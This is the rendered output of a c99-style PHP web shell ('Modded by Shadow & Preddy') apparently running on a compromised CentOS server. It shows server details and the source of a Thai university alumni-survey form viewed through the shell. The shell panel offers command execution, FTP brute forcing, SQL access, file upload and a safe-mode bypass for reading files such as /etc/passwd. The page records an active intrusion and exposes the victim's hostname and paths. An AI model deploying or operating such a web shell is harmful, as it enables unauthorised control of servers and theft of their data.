!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/views/ealumni/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_alumniforQnStd.php (17.93 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<script type="text/javascript">
function checkWork(val){
    if(val=="Y"){
         document.getElementById("work").style.display="block";
         document.getElementById("edu").style.display="none";
    }else if(val=="N"){
         document.getElementById("work").style.display="none";
         document.getElementById("edu").style.display="block";
    }else  if(val=="W"){
         document.getElementById("edu").style.display="none";
          document.getElementById("work").style.display="none";
    }
}
</script>
<?php
$row_am 
= (isset($qu_am) && $qu_am!=NULL) ? $qu_am->row() : NULL;
?>

<table width="100%">
    <tr>
        <td><label><div align="center"><?php echo form_open($this->config->item("ea_folder")."query/qn_save", array("name" => "myform""id" => "myform"));?>
            <table width="100%">    
                <tr>
                    <td align="center" class="h">ข้อมูลการได้งานทำ และศึกษาต่อ</td>
                </tr>
                <tr><td>
                    <table width="100%"><br />
                        <tr bgcolor="<?php echo $this->config->item("table_color");?>">
                            <td class="coltd_easzone" colspan="4">ข้อมูลผู้สำเร็จการศึกษา</td>
                        </tr>
<?php
        
foreach($qu_am->result() as $qu_am) {
?>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone">ชื่อ - สกุล</td>
                            <td><? echo $qu_am->prefixNameFull.$qu_am->studentName."  ".$qu_am->studentSurname?></td>
                            <td class="coltd_easzone">ปีการศึกษา</td>
                            <td><? echo $qu_am->admitAcadYear;?>
                            </td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone" >หลักสูตร</td>
                            <td><? echo $qu_am->curName;?></td>
                            <td class="coltd_easzone" >รุ่นที่</td>
                            <td><? echo $qu_am->genNo;?></td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone">เบอร์โทรศัพท์</td>
                            <td><input type="text" name="currentPhoneNo" value="<?php echo $qu_am->currentPhoneNo;?>" size="10"><?php echo form_error("currentPhoneNo");?></td>
                            <td class="coltd_easzone">อีเมลล์</td>
                            <td><input type="text" name="studentEmail"  value="<?php echo $qu_am->studentEmail;?>" size="25"><?php echo form_error("studentEmail");?></td>
                        </tr>
<?php
        
}
?>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td align="center" colspan="4"><br /></td>
                        </tr>
                    </table>
<?php
    
if($qu_aq->num_rows()) {
        foreach(
$qu_aq->result() as $qu_aq) {
?>
                    <table width="100%">
                        <tr bgcolor="<?php echo $this->config->item("table_color");?>">
                            <td class="coltd_easzone" colspan="4">ข้อมูลผู้สำเร็จการศึกษา</td>
                        </tr>
<?php
            
if (($qu_aq->checkwork) == "Y") {
?>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone" colspan="4">มีงานทำ</td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone">สถานะการทำงาน</td>
                            <td><? echo $qu_aq->checkProfession="Y" "ตรงวิชาชีพ" "อาชีพอิสระ"?></td>
                            <td class="coltd_easzone">วันที่เริ่มทำงาน</td>
                            <td><? echo $qu_aq->startDateWork;?></td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone" >สถานที่ปฏิบัติงาน</td>
                            <td colspan="3"><? echo $qu_aq->companyNameT;?></td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone" >ที่อยู่ที่ทำงาน</td>
                            <td><? echo $qu_aq->companyAddr;?></td>
                            <td class="coltd_easzone" >ตำบล</td>
                            <td><? echo $qu_aq->districtName;?></td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone" >อำเภอ</td>
                            <td><? echo $qu_aq->amphurName;?></td>
                            <td class="coltd_easzone" >จังหวัด</td>
                            <td><? echo $qu_aq->provinceName;?></td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone" >รหัสไปรษณีย์</td>
                            <td><? echo $qu_aq->officeZipcode;?></td>
                            <td class="coltd_easzone" >เบอร์โทรศัพท์</td>
                            <td><? echo $qu_aq->officePhoneNo;?></td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone" >ตำแหน่งงาน</td>
                            <td colspan="3"><? echo $qu_aq->workPosition;?></td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone" >อัตราเงินเดือน</td>
                            <td><? echo $qu_aq->workSalary1;?>  บาท/เดือน</td>
                            <td class="coltd_easzone" >อัตราเงินพิเศษ</td>
                            <td ><? echo $qu_aq->workSalary2;?>  บาท/เดือน</td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td align="center" colspan="4"><br /></td>
                        </tr>
<?php
            
} else if (($qu_aq->checkwork) == "N") {
?>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone" colspan="4">ศึกษาต่อ</td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone">ระดับการศึกษา</td>
                            <td><? echo $qu_aq->levelName;?></td>
                            <td class="coltd_easzone" >สาขา (คณะ/วิทยาลัย)</td>
                            <td><? echo $qu_aq->meduName;?></td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone" > สถานศึกษา (มหาวิทยาลัย/สถาบัน)</td>
                            <td  colspan="3"><? echo $qu_aq->eduName;?></td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td align="center" colspan="4"><br /></td>
                        </tr>
                    
<?php        
            
} else if (($qu_aq->checkwork) == "W") {
?>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone" colspan="4">ทำงานก่อนมาเรียน</td>
                        </tr>
<?php
            
}
?>
                    </table>
<?php
        
}
    } else {
?>
                    <table width="100%">
                        <tr bgcolor="<?php echo $this->config->item("table_color");?>">
                            <td class="coltd_easzone" colspan="4">ข้อมูลหลังสำเร็จการศึกษา</td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone" colspan="4">
                            <input type="radio" name="checkwork" id="rad3" value="W" <?=((setValue('checkwork'$row_am)!="Y") ? "checked" "");?> onclick="checkWork('W')"/>ทำงานก่อนมาเรียน</td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone" colspan="4">
                            <input type="radio" name="checkwork" id="rad1" value="Y" <?=((setValue('checkwork'$row_am)!="N") ? "checked" "");?> onclick="checkWork('Y')"/>มีงานทำ</td>
                        </tr>
                        <tr><td><div id="work" style="display:none;">
                            <table width="100%">
                                <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                                    <td><font size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>สถานะการทำงาน</b></font></td>
                                    <td><input type="radio" name="checkprofession" id="rad3" value="Y"><b>ตรงวิชาชีพ</b></td>
                                    <td colspan="2"><input type="radio" name="checkprofession" id="rad4" value="N"><b>อาชีพอิสระ</b><?php echo form_error("checkprofession");?></td>
                                </tr>
                                <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                                    <td><font size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>วันที่เริ่มทำงาน</b></font></td>
                                    <td colspan="3"><font size="2"><b>
                                    <?    //if(($oQn->startDateWork == '0000-00-00') ||  ($oQn->startDateWork =="")) {?> <script>DateInput('startDateWork', true, 'DD/MM/YYYY','<?php echo getNowDateFw2();?>');</script>
                                    <? //} else {?> <script>DateInput('startDateWork', true, 'DD/MM/YYYY','<?php echo splitDateDb($oQn->startDateWork,"/");?>');</script><? //} ?></b></font></td>
                                </tr>
                                <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                                    <td><font size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>สถานที่ปฏิบัติงาน</b></font></td>
                                    <td colspan="3"><font size="2">
                                    <input type="text" name="officeName" value="<?php echo set_value('officeName');?>" size="20"></font><?php echo form_error("officeName");?></font></td>
                                </tr>
                                <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                                    <td><font size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>ที่อยู่ที่ทำงาน</b></font></td>
                                    <td ><font size="2"><input type="text" name="officeAddress" value="<?php echo set_value('officeAddress');?>" size="20"></font><?php echo form_error("officeAddress");?></td>
                                    <td class="coltd_easzone"><font size="2">ตำบล</font></td>
                                    <td ><font size="2">
                                    <input type="hidden" name="offDistrictId" id="offDistrictId" size="20"  value="<?php echo set_value('offDistrictId');?>" readonly />
                                    <input type="text" name="offDistrictName" id="offDistrictName" size="20" class="input2" value="<?php echo set_value('offDistrictName');?>" readonly /><?php echo form_error("offDistrictName");?>
        <?php
                                    
echo anchor_popup($this->config->item("ea_folder")."popup/offAdr_popup""<img src=\"".base_url()."images/".$this->config->item("rg_folder")."picture/search.gif\" width=\"15\" height=\"19\" align=\"abmiddle\" border=\"0\" />", array("width" => "600""height" => "350"));
        
?>    
                                    </font></td>
                                </tr>
                                <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                                    <td><font size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>อำเภอ</b></font></td>
                                    <td><font size="2">
                                    <input type="text" name="offAmphurName" id="offAmphurName" size="20" class="input2" value="<?php echo set_value('offAmphurName');?>" readonly /><?php echo form_error("offAmphurName");?>
                                    <input type="hidden" name="offAmphurId" id="offAmphurId" value="<?php echo set_value('offAmphurId');?>" readonly />
                                    </font></td>
                                    <td class="coltd_easzone"><font size="2">จังหวัด</font></td>
                                    <td><font size="2">
                                    <input type="text" name="offProvinceName" id="offProvinceName" size="20" class="input2" value="<?php echo set_value('offProvinceName');?>" readonly /><?php echo form_error("offProvinceName");?>
                                    <input type="hidden" name="offProvinceId" id="offProvinceId" value="<?php echo set_value('offProvinceId');?>" readonly />
                                    </font></td>
                                </tr>
                                <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                                    <td><font size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>รหัสไปรษณีย์</b></font></td>
                                    <td><font size="2">
                                    <input type="text" name="officeZipcode"  value="<?php echo set_value('officeZipcode');?>" size="5" maxlength="5">
                                    </font><?php echo form_error("officeZipcode");?></td>
                                    <td class="coltd_easzone"><font size="2">เบอร์โทรศัพท์</font></td>
                                    <td height="22"><font size="2">
                                    <input type="text" name="officePhoneNo" value="<?php echo set_value('officePhoneNo');?>" size="10" maxlength="10">
                                    </font><?php echo form_error("officePhoneNo");?></td>
                                </tr>
                                <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                                    <td><font size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>ตำแหน่งงาน</b></font></td>
                                    <td colspan="3"><font size="2"><input type="text" name="workPosition"  value="<?php echo set_value('workPosition');?>" size="20" ></font></td>
                                </tr>
                                <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                                    <td><font size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>อัตราเงินเดือน </b></font></td>
                                    <td><font size="2"><input type="text" name="workSalary1" value="<?php echo set_value('workSalary1');?>" size="20"><b> บาท/เดือน</b></font><?php echo form_error("workSalary1");?></td>
                                    <td class="coltd_easzone"><font size="2">อัตราเงินพิเศษ</font></td>
                                    <td><font size="2"><input type="text" name="workSalary2" value="<?php echo set_value('workSalary2');?>" size="20"><b> บาท/เดือน</b></font><?php echo form_error("workSalary2");?></td>
                                </tr>
                                <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                                    <td colspan="2"></td>
                                    <td class="coltd_easzone" colspan="2" ><font color="<?php echo $this->config->item('font_color_err');?>" size="2"><b> (เงินทำงานล่วงเวลา, เงิน พตส.ม เงินค่าประกอบวิชาชีพ, ค่าเวรบ่าย-ดึก)</b></font></td>
                                </tr>
                            </table>
                        </div></td></tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone" colspan="4">
                            <input type="radio" name="checkwork" id="rad2" value="N"  <?=((setValue('checkwork'$row_am)!="N") ? "checked" "");?> onclick="checkWork('N')"><b>ศึกษาต่อ</td>
                        </tr>
                        <tr><td><div id="edu" style="display:none;">
                            <table width="100%">
                                <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                                    <td><font size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>ระดับการศึกษา</b></font></td>
                                    <td><font size="2">
                                    <input type="hidden" name="leveleduId" id="leveleduId" size="20"  value="<?php echo set_value('leveleduId');?>" readonly />
                                    <input type="text" name="leveleduName" id="leveleduName" size="30" class="input2" value="<?php echo set_value('leveleduName');?>" readonly /><?php echo form_error("leveleduName");?>
                                    </font>
        <?php
                                    
echo anchor_popup($this->config->item("ea_folder")."popup/lvEdu_popup""<img src=\"".base_url()."images/".$this->config->item("rg_folder")."picture/search.gif\" width=\"15\" height=\"19\" align=\"abmiddle\" border=\"0\" />", array("width" => "600""height" => "350"));
        
?>    
                                    <?php echo form_error("leveleduName");?></td>
                                    <td><font size="2"><b>สาขา  (คณะ/วิทยาลัย)</b></font></td>
                                    <td><font size="2">
                                    <input type="hidden" name="majoreduId" id="majoreduId" size="20"  value="<?php echo set_value('majoreduId');?>" readonly />
                                    <input type="text" name="majoreduName" id="majoreduName" size="50" class="input2" value="<?php echo set_value('majoreduName');?>" readonly /><?php echo form_error("majoreduName");?>
                                    </font>
        <?php
                                    
echo anchor_popup($this->config->item("ea_folder")."popup/medu_popup""<img src=\"".base_url()."images/".$this->config->item("rg_folder")."picture/search.gif\" width=\"15\" height=\"19\" align=\"abmiddle\" border=\"0\" />", array("width" => "600""height" => "350"));
        
?>    
                                    <?php echo form_error("majoreduName");?></td>
                                </tr>
                                <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                                    <td colspan='4'><font size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>สถานศึกษา (มหาวิทยาลัย/สถาบัน)</b></font>
                                    <input type="hidden" name="eduId" id="eduId" size="20"  value="<?php echo set_value('leveleduId');?>" readonly />
                                    <input type="text" name="eduName" id="eduName" size="40" class="input2" value="<?php echo set_value('eduName');?>" readonly /><?php echo form_error("eduName");?>
                                    </font>
        <?php
                                    
echo anchor_popup($this->config->item("ea_folder")."popup/edu_popup""<img src=\"".base_url()."images/".$this->config->item("rg_folder")."picture/search.gif\" width=\"15\" height=\"19\" align=\"abmiddle\" border=\"0\" />", array("width" => "600""height" => "350"));
        
?>    
                                    <?php echo form_error("eduName");?></td>
                                </tr>
                            </table>
                        </div></td></tr>
                    </table>
                    <table width="100%">
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td align="left" colspan="4"><?php echo form_error("checkwork");?><br /></td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item("table_color");?>">
                            <td class="coltd_easzone" colspan="4">การเข้าร่วมพิธีพระราชทานประกาศนียบัตร</td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td height=22 colspan="4"><font size="2">&nbsp;&nbsp;&nbsp;&nbsp;<input name="investiture" type="radio" value="Y" checked><b>เข้าร่วม</b>&nbsp;&nbsp;<input name="investiture" type="radio" value="N"><b>ไม่เข้าร่วม</b></font><?php echo form_error("investiture");?></td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td align="center" colspan="4">
                            <input type="submit" name="add" value="ตกลง" >
                            <input type="reset" name="clear" value="ลบข้อมูล">
                            <input type="hidden" name="method" value="<? echo "add"?>"></td>            
                        </tr>
                    </table>
<?php
    
}
?>
                </td></tr>
            </table>
        <?php echo form_close();?></div></label></td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0146 ]--